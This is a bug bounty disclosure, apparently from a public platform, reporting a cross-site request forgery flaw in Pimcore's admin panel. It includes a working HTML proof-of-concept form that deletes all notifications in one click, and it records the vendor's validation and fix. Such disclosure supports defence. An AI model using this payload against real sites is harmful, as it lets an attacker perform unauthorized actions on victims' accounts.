Cross-Site Request Forgery (CSRF) in pimcore/pimcore

Valid

Reported on

Jul 30th 2021


✍️ Description

Your application have not any CSRF protection and also You set the SameSite attribute to Lax, this means if you want to alter some data with GET HTTP requests, then your site should be vulnerable to CSRF attacks with no doubt.

First you run this Html payload and then you should see that the all notifications been deleted .

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://x.pimcore.fun/admin/notification/delete-all">
<input type="hidden" name="&#95;dc" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

I test this Payload on both stable and dev Editions.(on x.pimcore.fun)

💥 Impact

This vulnerability is capable of delete any notification only with one click.

Occurences

We have contacted a member of the pimcore team and are waiting to hear back 4 months ago
Bernhard Rusch validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bernhard Rusch confirmed that a fix has been merged on 80713c 4 months ago
Bernhard Rusch has been awarded the fix bounty